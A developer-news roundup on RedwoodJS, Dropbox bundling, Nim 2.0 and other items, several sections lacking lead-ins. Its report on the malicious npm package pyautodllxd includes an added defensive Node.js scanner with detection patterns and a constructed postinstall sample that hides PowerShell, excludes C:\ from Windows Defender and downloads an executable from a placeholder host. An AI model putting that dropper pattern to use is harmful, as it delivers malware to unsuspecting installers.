Dev News: RedwoodJS Drops Jamstack, Dropbox Reduces JS Bundles
“For the last year, the RedwoodJS team has been prototyping solutions to the framework’s lack of a proper server-side rendering (SSR) feature,” he wrote. “Today, I’m happy to announce that we have chosen to implement a modern SSR solution with a front-end server, leveraging React’s streaming capabilities. This will also allow us to add React Server Components (RSC) to Redwood as our solution to the many downsides of pure single page applications (SPAs).”
It’s a lot of acronyms, but Preston-Werner cited a list of reasons to switch to React Server Components (RSC), including:
- Better SEO performance in the form of statically rendered HTML delivered to the browser. With server rendering, that’s “baked in,” he added — an advantage over the SPA architecture;
- OG tags, which require statically delivered HTML to use. Again, server-side rendering solves for this use; and
- Providing API options to connect beyond the GraphQL API backend.
“It’s challenging to get top-notch performance out of Redwood in a Jamstack environment,” Preston-Werner wrote. “AWS Lambda’s cold start times, code payload limits, and execution timeouts are all hurdles that need to be considered. Most Redwood users today already choose a serverful deployment strategy for exactly these reasons.”
The original goal was to make it possible for most of Redwood’s features to work in serverless environments. But from now on, Redwood will be optimizing for serverful RSC and all the advantages that will bring.
“You can read a full account of RSC’s advantages elsewhere, but more of my favorites are: smaller bundle sizes shipped to the browser, large libraries can be run server-side only (more bundle savings), quicker hydration, and easy server-side secrets,” he wrote. “RSC is the future of React. The React team has made this very clear and we are lucky to be in touch with their amazing team members to help us along this path.”
Its first change? A new bundler. The old one, dating from 2014, didn’t incorporate many performance optimizations and was difficult to work with, Dropbox noted.
“While our existing bundler was relatively build-time efficient, it resulted in massive bundle sizes and proved to be a burden for engineers to maintain,” the post noted. “We relied on engineers to manually define which scripts to bundle with a package, and we simply shipped all packages involved in rendering a page with few optimizations.”
That became problematic over time, it added, creating multiple versions of bundled code, manual code splitting and no tree shaking.
“The latest combatant to enter the fray is an NPM package known as pyautodllxd,” Socket Research reported Monday. “This seemingly innocuous package was uploaded by an author named ‘T4hg’ and last updated on April 18, 2023.”
At first glance, ‘pyautodllxd’ doesn’t appear to impersonate any popular package or engage in typosquatting. Its purpose and target audience remain elusive, as both the ReadMe file and description were left blank. However, when Socket Research examined the postinstall command, it uncovered suspicious code.
The postinstall command runs a PowerShell command, suggesting that the attacker targets Windows operating systems, the research note pointed out.
“Upon closer inspection, we discovered a binary named ‘esquele.exe’ being downloaded from a Dropbox URL,” the post stated. “This stealthy approach allows the payload to be deployed without raising any red flags.”
After installation, the package simultaneously downloads the malicious executable and saves it in the temp folder for later execution. Socket Research noted that several vendors had marked the decoded PowerShell script as a malicious trojan.
The firm’s analysis found that pyautodllxd runs a hidden PowerShell window, downloads a script named bypass.ps1, and uses the “Esquele” function to add exclusion paths for drives C:\ and D:\, bypassing Windows Defender’s real-time protection.
The Skeleton Squad left a cryptic message in Spanish in some of the packages published by T4hg, which translates to “They will all die in the hands of EsqueleSquad,” the research note added.
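As an added illustration that is not part of the article or of Socket Research’s report, the following Node.js script audits an npm package manifest for the install-hook behaviour described above: a postinstall command that launches a hidden PowerShell window with an encoded command, downloads remote content, or changes Windows Defender exclusions. The indicator list, the function names and both sample manifests are constructed for this example; the suspicious one mirrors the reported behaviour with placeholder URLs and is not the real package’s script.

```javascript
// Added example (not Socket Research's tooling): audit npm install hooks for
// the PowerShell-dropper pattern described in the report. Indicators and
// sample manifests below are constructed for illustration.

const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Each indicator is a regex plus the reason reported when it matches.
const INDICATORS = [
  { re: /\bpowershell(?:\.exe)?\b|\bpwsh\b/i, reason: "launches PowerShell" },
  { re: /-w(?:indowstyle)?\s+hidden\b/i, reason: "hidden PowerShell window" },
  { re: /-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}/i, reason: "base64-encoded command" },
  { re: /\b(?:Invoke-WebRequest|iwr|wget|curl|DownloadFile|DownloadString|Start-BitsTransfer)\b/i,
    reason: "downloads remote content" },
  { re: /\b(?:Add|Set)-MpPreference\b/i, reason: "modifies Windows Defender settings" },
  { re: /\bStart-Process\b|\.exe\b/i, reason: "executes a binary" },
];

// PowerShell's -EncodedCommand carries base64 of UTF-16LE text; decode it so
// the indicators can also run over the plaintext script an analyst would see.
function decodeEncodedCommand(cmd) {
  const m = /-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})/i.exec(cmd);
  if (!m) return null;
  return Buffer.from(m[1], "base64").toString("utf16le");
}

function scanText(text) {
  return INDICATORS.filter(({ re }) => re.test(text)).map(({ reason }) => reason);
}

// Returns a report object: one finding per install hook that trips an indicator.
function auditManifest(manifestJson) {
  const manifest = JSON.parse(manifestJson);
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const decoded = decodeEncodedCommand(cmd);
    const reasons = new Set([...scanText(cmd), ...(decoded ? scanText(decoded) : [])]);
    if (reasons.size > 0) findings.push({ hook, command: cmd, decoded, reasons: [...reasons] });
  }
  return { name: manifest.name, version: manifest.version, suspicious: findings.length > 0, findings };
}

// Constructed sample inputs (placeholder URL, not the real package's payload).
const CONSTRUCTED_SCRIPT =
  "Add-MpPreference -ExclusionPath 'C:\\'; " +
  "Invoke-WebRequest 'https://example.invalid/placeholder' -OutFile \"$env:TEMP\\placeholder.exe\"";
const ENCODED = Buffer.from(CONSTRUCTED_SCRIPT, "utf16le").toString("base64");

const BENIGN_MANIFEST = JSON.stringify({
  name: "example-native-addon", version: "1.0.0",
  scripts: { postinstall: "node scripts/build-native.js" },
});

const SUSPICIOUS_MANIFEST = JSON.stringify({
  name: "constructed-sample", version: "0.0.1",
  scripts: { postinstall: `powershell -w hidden -ep bypass -enc ${ENCODED}` },
});

for (const m of [BENIGN_MANIFEST, SUSPICIOUS_MANIFEST]) {
  const r = auditManifest(m);
  console.log(`${r.name}@${r.version}: ${r.suspicious ? "SUSPICIOUS" : "clean"}`);
  for (const f of r.findings) console.log(`  ${f.hook}: ${f.reasons.join(", ")}`);
}
```

Pointing this at the `package.json` files under `node_modules` after an install (or at a registry tarball before installing) surfaces the hook, the decoded script and the matched reasons; an encoded PowerShell command in any install hook is a strong enough signal on its own to quarantine the package for review.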
Nim v2.0 Released
Nim version 2.0 was released earlier this month. Nim is a relatively new programming language, but it’s used in web development, systems programming, game development, artificial intelligence, data science and scientific computing. Among its advantages are speed and efficiency: Nim code compiles to native machine code. It’s also expressive and extensible, supporting metaprogramming. Finally, Nim code can be compiled to run on a variety of platforms, including Windows, Linux, macOS, and FreeBSD. So it has a lot to recommend it.
“This is an evolution (not revolution) of Nim, bringing ORC memory management as a default, along with many other new features and improvements,” the release note stated.
It also cautioned that “Nim is a programming language that is good for everything, but not for everybody.” Its customizable memory management makes it well suited for unforgiving domains such as hard real-time systems and system programming in general, the post stated.
Among the new features are:
- Better tuple unpacking. “Tuple unpacking for variables is now treated as syntax sugar that directly expands into multiple assignments,” the release note stated. “Along with this, tuple unpacking for variables can now be nested.”
- Improved type inference. “A new form of type inference called top-down inference has been implemented for a variety of basic cases,” the release notes state.
- Forbidden tags. “Tag tracking now supports the definition of forbidden tags by the .forbids pragma which can be used to disable certain effects in proc types,” it added.
- A new standard libraries model. Essentially, this overhauls its os module.
New users can download the language online.
John Cowan, the chair of the R7RS-large language project, resigned his position in a public post on Google Groups this week. That project oversees the use of Scheme as an active, rather than teaching, language.
“I have come to the conclusion that I can no longer serve as Chair. I am exhausted by the effort, and I do not think that there is any further hope that I can get sufficient agreement among the different players to have any hope of coming to a conclusion,” he wrote. “On the contrary, agreement is further away than ever, and people’s views are more and more entrenched.”
This Hacker News thread offers background information about Scheme.
Web Frameworks as Superheroes
This is simply too cute not to share: Developer Matija Sosic recently used the generative AI tool Midjourney to visualize web frameworks as superheroes. It features popular web frameworks such as Vue, React.js, Wasp and Ruby on Rails. React.js is heralded as the king of the frameworks, while Nest.js is literally a server-side beast of a character. The Wasp contributor promises to do more frameworks in the future.